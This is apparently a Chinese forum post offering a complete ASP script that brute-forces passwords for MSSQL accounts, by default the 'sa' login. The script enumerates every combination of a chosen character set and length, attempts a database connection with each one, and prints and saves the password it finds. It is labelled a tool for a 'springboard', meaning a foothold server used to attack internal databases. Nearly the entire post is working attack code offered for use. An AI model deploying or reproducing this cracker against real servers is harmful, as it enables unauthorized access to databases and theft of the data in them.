一个暴力破解MSSQL用户密码的ASP程序
作者: knight
一个暴力mssql用户密码的asp程序,以下这个版本是可以运行之后关闭,运行完毕将在当前目录生成结果文件的。
code:
[copy to clipboard]
<%
============ asp port scanner by lake2 ===================
http://lake2.0x54.org
version: 0.1
for springboard
==========================================================
%>
<style type="text/css">
body,td,th {color: #0000ff;font-family: verdana, arial, helvetica, sans-serif;}
body {background-color: #ffffff;font-size:14px; }
a:link {color: #0000ff;text-decoration: none;}
a:visited {text-decoration: none;color: #0000ff;}
a:hover {text-decoration: none;color: #ff0000;}
a:active {text-decoration: none;color: #ff0000;}
.buttom {color: #ffffff; border: 1px solid #084b8e; background-color: #719bc5}
.textbox {border: 1px solid #084b8e}
.stylered {color: #ff0000}
</style>
<title>mssql cracker for springboard</title>
<%
dim password()
if request.form("go") <> "1" then
%>
<p align="center">welcome to <a href="" target="_blank">http://lake2.0x54.org</a> </p>
<form name="form1" method="post" action="" onsubmit="form1.submit.disabled=true;">
connstr:
<input name="conn" type="text" class="textbox" id="conn" value="provider=sqloledb.1;data source=127.0.0.1;user id=sa;password={pass};" size="70">
<br>
char:
<input name="char" type="text" class="textbox" id="char" value="0123456789" size="30">
<br>
length:
<input name="len" type="text" class="textbox" id="len" value="3" size="4">
<br>
path:
<input name="path" type="text" class="textbox" value="<%=server.mappath("r.txt")%>" size="50">
<input name="cfile" type="checkbox" class="textbox" id="cfile" value="1" checked>
enablel<br>
<input name="go" type="hidden" id="go" value="1">
<br>
<input name="submit" type="submit" class="buttom" id="submit" value=" run ">
</form>
<%
else
timer1 = timer
server.scripttimeout = 7776000
connstr = request.form("conn")
char = request.form("char")
lenchar = len(char)
redim password(lenchar)
for i = 1 to lenchar
password(i) = mid(char, i, 1)
next
length = cint(request.form("len"))
call lake("")
response.write "done!<br>process " & ttime & " s"
if request.form("cfile") <> "" then createresult("done!" & vbcrlf & ttime)
end if
sub lake(str)
if len(str) >= length then exit sub
for j = 1 to lenchar
pass = str & password(j)
if len(pass) = length then call crack(pass)
call lake(pass)
next
end sub
sub crack(str)
on error resume next
set conn = server.createobject("adodb.connection")
conn.open replace(connstr,"{pass}",str)
if err then
if err.number <> -2147217843 then
response.write(err.description & "<br>")
response.end()
end if
else
response.write("i get it ! password is <font color=red>" & str & "</font><br>process " & ttime & " s")
if request.form("cfile") <> "" then createresult(str & vbcrlf & ttime)
response.end()
end if
end sub
function ttime()
timer2 = timer
thetime=cstr(int(timer2-timer1))
ttime = thetime
end function
sub createresult(t)
set fs = createobject("scripting.filesystemobject")
set outfile = fs.createtextfile(request.form("path"))
outfile.writeline t
set fs = nothing
end sub
%>